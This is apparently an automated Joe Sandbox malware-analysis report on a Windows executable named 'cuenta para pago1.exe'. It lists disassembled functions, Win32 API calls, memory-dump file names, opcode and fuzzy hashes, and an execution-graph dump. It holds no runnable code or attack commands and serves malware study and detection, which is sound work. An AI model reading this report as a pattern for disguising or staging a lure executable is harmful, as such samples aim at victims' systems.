                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-787714339
                                                                                      • Opcode ID: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                                                                      • Instruction ID: 0310c51cfe5e9f7ce5f17852bd92726e60929743d8abc3d3bdfc5d6511664db2
                                                                                      • Opcode Fuzzy Hash: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                                                                      • Instruction Fuzzy Hash: C0D0A731111530ABC211AB488D04DDF739C9E463453424037F101B31A1D7785D5197FE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,00402F6A,?,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00402D9D
                                                                                      • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00402DE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                                                      • Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
                                                                                      • Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                                                      • Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403B39 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowTextW.USER32(00000000,00428200), ref: 00403BD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: TextWindow
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$1033
                                                                                      • API String ID: 530164218-3643185989
                                                                                      • Opcode ID: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                                                                      • Instruction ID: a3bd2acee85f271d60691375da4bc4fc24ae93d70a97cc42eb68c8ddca864a14
                                                                                      • Opcode Fuzzy Hash: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                                                                      • Instruction Fuzzy Hash: C311F631B40611EBC7349F15DC809777BBCEB45719718857FE801A73A2CA39AD038A68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004050ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 0040511C
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                                                                        • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                                                      • Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
                                                                                      • Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                                                      • Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004037CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,77573420,00000000,C:\Users\user\AppData\Local\Temp\,004037A6,004035BC,?), ref: 004037E8
                                                                                      • GlobalFree.KERNEL32(?), ref: 004037EF
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004037CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-787714339
                                                                                      • Opcode ID: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                                                      • Instruction ID: fd5cce2495c6c1b199366fa48a4731a267e7b28c4e3a2e6049d666ad51adf226
                                                                                      • Opcode Fuzzy Hash: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                                                      • Instruction Fuzzy Hash: F3E0C2B39040305BC7216F14EC4471AB7A86F88B32F058126F8817B3A087742C924FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405A1A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cuenta para pago1.exe,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405A20
                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cuenta para pago1.exe,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405A30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3443045126
                                                                                      • Opcode ID: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                                                      • Instruction ID: 6345b2d933a2ce4686671ca67b85a4373090522c5e7ae7861229ca93a50cc92f
                                                                                      • Opcode Fuzzy Hash: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                                                      • Instruction Fuzzy Hash: 95D05EB2521A309BC312AB08DC4199F63ACEF223057468426F441A61A0D3785C808AB9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405B54 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                                                                      • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                                      • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                                                                      • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                                      • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:0%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:23.8%
                                                                                      Total number of Nodes:101
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 38942 34902b90 LdrInitializeThunk 39040 348bcd8a 211 API calls 38944 348df889 223 API calls 39041 34970593 10 API calls 39042 3498959f 6 API calls 39043 348dfd85 GetPEB RtlDebugPrintTimes GetPEB GetPEB GetPEB 39044 348c1380 60 API calls 39045 348dcd80 239 API calls 38948 348b7c85 215 API calls 38949 348ebe80 209 API calls 38950 3496ec84 LdrInitializeThunk 38952 348bfe90 6 API calls 38953 348bc090 219 API calls 38954 348ba290 330 API calls 38956 348c7290 14 API calls 38957 348dd690 GetPEB RtlDebugPrintTimes RtlDebugPrintTimes 39046 348c6d91 GetPEB GetPEB GetPEB 39047 348b8196 GetPEB GetPEB 38958 348fb490 257 API calls 39049 349915ba 225 API calls 39050 348b7da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 38963 348c06a0 219 API calls 38964 348c00a0 352 API calls 38969 348c42b0 GetPEB RtlDebugPrintTimes 39053 348c45b0 209 API calls 38973 348c4cca 10 API calls 38974 348f9cc4 19 API calls 38975 3497cedc 219 API calls 38976 348bb0c0 263 API calls 39056 348bbfc0 GetPEB GetPEB GetPEB GetPEB 39057 348b81c0 GetPEB 39058 348be3c0 258 API calls 38977 348c3ec0 8 API calls 39059 348c1dc0 RtlDebugPrintTimes GetPEB GetPEB GetPEB GetPEB 39060 348d51c0 214 API calls 38978 3494a4c1 LdrInitializeThunk LdrInitializeThunk 38979 348c4cd5 RtlDebugPrintTimes GetPEB GetPEB GetPEB 39062 348b9fd0 209 API calls 39063 348bc1d0 208 API calls 38980 348c1cd0 213 API calls 39064 348d9dd0 220 API calls 38981 348ef4d0 221 API calls 38982 348e62e9 221 API calls 39066 3499a1f0 8 API calls 38983 348b72e0 208 API calls 38984 348c56e0 246 API calls 38986 348e66e0 265 API calls 38987 348c3ee2 7 API calls 38988 3499aceb RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 38989 3497c6e4 219 API calls 38990 349802ec 10 API calls 38992 348c64f0 RtlDebugPrintTimes GetPEB 39069 348c71f0 302 API calls 38993 348eecf3 225 API calls 38994 348eacf0 10 API calls 38996 348bec0b 221 API calls 38997 3494b214 212 API calls 39071 348c510d 233 API calls 38998 348c8009 208 API calls 38999 348b640d 242 API calls 39000 348b6e00 RtlDebugPrintTimes RtlDebugPrintTimes 39002 348c6e00 16 API calls 39003 348ed600 245 API calls 39074 348f0100 210 API calls 39005 348c3e14 218 API calls 39006 348fdc14 219 API calls 39007 348b9610 219 API calls 39009 348c2410 212 API calls 39010 34953608 340 API calls 39011 348f2c10 216 API calls 39013 3497c03d 220 API calls 39014 348bb420 8 API calls 39015 348bb620 GetPEB RtlDebugPrintTimes GetPEB 39077 348bbf20 217 API calls 39016 348c2022 14 API calls 39019 348c2e32 219 API calls 39081 348de547 228 API calls 39082 348ba740 259 API calls 39083 348bc140 216 API calls 39024 348b6c5d 210 API calls 39086 348eff50 337 API calls 39087 348f7550 216 API calls 39089 3493e372 214 API calls 39026 348bdc60 213 API calls 39028 348b7060 RtlDebugPrintTimes 39029 348bb260 225 API calls 39030 3495327e 11 API calls 39031 348c3c60 11 API calls 39032 348c4660 10 API calls 39033 348d3c60 76 API calls 39034 348c0c79 222 API calls 39035 348c8c79 6 API calls 39036 34969060 20 API calls 39037 348c6074 219 API calls 39038 34970e6d 72 API calls 39091 348bbf70 GetPEB LdrInitializeThunk 39039 3497be6b 62 API calls 39092 348c5570 253 API calls 39093 348c1f70 20 API calls 39094 348eaf72 18 API calls 39095 348ea370 64 API calls

                                                                                      Executed Functions

                                                                                      Function 349034E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2 349034e0-349034ec LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b59ca3c25dfb9b92fac52c5204dad1206f57a417d88991e0383b91ff4bf41c7f
                                                                                      • Instruction ID: 4a8a1b4a264d516c9547d47282b2fc784d80b9ea045b5c8f27a9a02ed3092ebe
                                                                                      • Opcode Fuzzy Hash: b59ca3c25dfb9b92fac52c5204dad1206f57a417d88991e0383b91ff4bf41c7f
                                                                                      • Instruction Fuzzy Hash: 9490023160520802D500A1584614706201547D0245F61C896A0515528DC7ADC95675A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34902D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1 34902d10-34902d1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3c2c7f5f7bf4c8ccfa5c7ba22a29ea060443f925052c79462e8a2a68faa65cf3
                                                                                      • Instruction ID: 4f9312b7f3fb05fbd3ffb2ac72a050283cab38c59d84522c211ed8025ddfd030
                                                                                      • Opcode Fuzzy Hash: 3c2c7f5f7bf4c8ccfa5c7ba22a29ea060443f925052c79462e8a2a68faa65cf3
                                                                                      • Instruction Fuzzy Hash: 7F90023120110813D511A1584604707101947D0285F91C897A0515518DD66EC957B121
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34902B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 34902b90-34902b9c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f44bbae12540014d38db78d91169f1e941886a27c89c59c2c1bd3786e7cbdf9e
                                                                                      • Instruction ID: 1f85344ed46f323e31d475d74201472efdd683b04b02dbc70f1bcc3c96a8b538
                                                                                      • Opcode Fuzzy Hash: f44bbae12540014d38db78d91169f1e941886a27c89c59c2c1bd3786e7cbdf9e
                                                                                      • Instruction Fuzzy Hash: F090023120118C02D510A158850474A101547D0345F55C896A4515618DC6ADC8967121
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 34969060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
